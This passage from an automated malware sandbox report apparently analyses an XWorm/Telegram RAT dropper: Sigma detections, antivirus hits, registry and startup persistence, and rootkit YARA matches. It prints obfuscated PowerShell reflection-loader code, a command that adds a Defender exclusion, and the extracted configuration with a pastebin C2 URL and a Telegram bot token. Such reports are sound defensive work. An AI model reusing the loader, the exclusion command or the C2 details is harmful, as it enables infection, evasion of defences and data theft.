''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'
                              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\KrnlSetupSus.exe" , ParentImage: C:\ProgramData\KrnlSetupSus.exe, ParentProcessId: 7424, ParentProcessName: KrnlSetupSus.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', ProcessId: 7712, ProcessName: powershell.exe
                              Sigma detected: Change PowerShell Policies to an Insecure Level
                              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\KrnlSetupSus.exe" , ParentImage: C:\ProgramData\KrnlSetupSus.exe, ParentProcessId: 7424, ParentProcessName: KrnlSetupSus.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', ProcessId: 7712, ProcessName: powershell.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\ntoskrnl.exe, EventID: 13, EventType: SetValue, Image: C:\ProgramData\KrnlSetupSus.exe, ProcessId: 7424, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntoskrnl
                              Sigma detected: Powershell Defender Exclusion
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\KrnlSetupSus.exe" , ParentImage: C:\ProgramData\KrnlSetupSus.exe, ParentProcessId: 7424, ParentProcessName: KrnlSetupSus.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\KrnlSetupSus.exe', ProcessId: 7712, ProcessName: powershell.exe
                              Sigma detected: Startup Folder File Write
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\ProgramData\KrnlSetupSus.exe, ProcessId: 7424, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk
                              Sigma detected: Uncommon Svchost Parent Process
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{27f34893-8e1f-47b7-b44f-212b7709bf94}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 7680, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:zDgZeIZuxWRL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lbrdggfZMoOJSI,[Parameter(Position=1)][Type]$IOfHboHVyv)$RBuJknKpjnm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'De'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+''+'t'+'o'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$RBuJknKpjnm.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+'a'+''+'m'+'e'+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lbrdggfZMoOJSI).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+'e'+'d'+'');$RBuJknKpjnm.DefineMethod(''+[Char](73)+''+[Char](110)+'voke','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$IOfHboHVyv,$lbrdggfZMoOJSI).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+'ime'+','+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $RBuJknKpjnm.CreateType();}$ysqdxYMCHCLNa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sys'+'t'+''+'e'+''+'m'+''+[Char](46)+'d'+[Char](108)+''+'l'+'')}).GetType('Mi'+[Char](99)+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+'U'+[Char](110)+'s'+'a'+''+[Char](102)+''+[Char](101)+'Nativ'+[Char](101)+''+[Char](77)+'e'+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ExDfVzsYxbumyj=$ysqdxYMCHCLNa.GetMethod(''+[Char](71)+''+'

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-14T18:53:48.901505+010028536851A Network Trojan was detected192.168.2.849713149.154.167.220443TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: RdLfpZY5A9.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\ProgramData\ntoskrnl.exeAvira: detection malicious, Label: TR/Spy.Gen
                              Source: C:\ProgramData\KrnlSetupSus.exeAvira: detection malicious, Label: TR/Spy.Gen
                              Source: C:\ProgramData\Install.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                              Found malware configuration
                              Source: 00000003.00000002.2788044587.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/Zx6DUkf9"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "driver.exe", "Telegram Token": "6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI", "Telegram Chatid": "5999137434"}
                              Source: KrnlSetupSus.exe.7424.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage"}
                              Multi AV Scanner detection for dropped file
                              Source: C:\ProgramData\Install.exeReversingLabs: Detection: 70%
                              Source: C:\ProgramData\KrnlSetupSus.exeReversingLabs: Detection: 73%
                              Source: C:\ProgramData\ntoskrnl.exeReversingLabs: Detection: 73%
                              Multi AV Scanner detection for submitted file
                              Source: RdLfpZY5A9.exeReversingLabs: Detection: 65%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\ntoskrnl.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\KrnlSetupSus.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Install.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: RdLfpZY5A9.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: https://pastebin.com/raw/Zx6DUkf9
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: <123456789>
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: <Xwormmm>
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: ezzznikka
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: driver.exe
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: %ProgramData%
                              Source: 0.2.RdLfpZY5A9.exe.1294ef08.2.unpackString decryptor: ntoskrnl.exe
                              Source: C:\ProgramData\Install.exeCode function: 2_2_007C1000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,2_2_007C1000

                              Exploits

                              barindex
                              Yara detected 77Rootkit
                              Source: Yara matchFile source: 2.2.Install.exe.7c40b0.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.1a84bcc81a8.13.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.1a854270000.16.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.Install.exe.7c40b0.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.Install.exe.7c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.Install.exe.7c0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.1a84bcc81a8.13.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.Install.exe.7c40b0.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.0.Install.exe.7c40b0.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 4.2.powershell.exe.1a854270000.16.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.1406899419.00000000007C2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000002.1516696154.000001A854270000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000002.00000000.1404083892.00000000007C2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000004.00000002.1499817567.000001A84BCC8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Install.exe PID: 7408, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Install.exe, type: DROPPED
                              Source: RdLfpZY5A9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.8:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49713 version: TLS 1.2
                              Source: RdLfpZY5A9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Diagnostics.pdb source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbx source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ~1.PDB @7_9)ux source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error3)y source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb04 source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: mp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000013.00000000.1520141464.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2769590466.0000028A1AA2A000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorV)y source: svchost.exe, 00000013.00000002.2770687739.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000000.1520207455.0000028A1AA40000.00000004.00000001.00020000.00000000.sdmp
                              Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\symsrv.dllp.pdb source: svchost.exe, 00000013.00000000.1520261331.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000013.00000002.2771872203.0000028A1AA5D000.00000004.00000001.00020000.00000000.sdmp
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                              Source: C:\ProgramData\Install.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
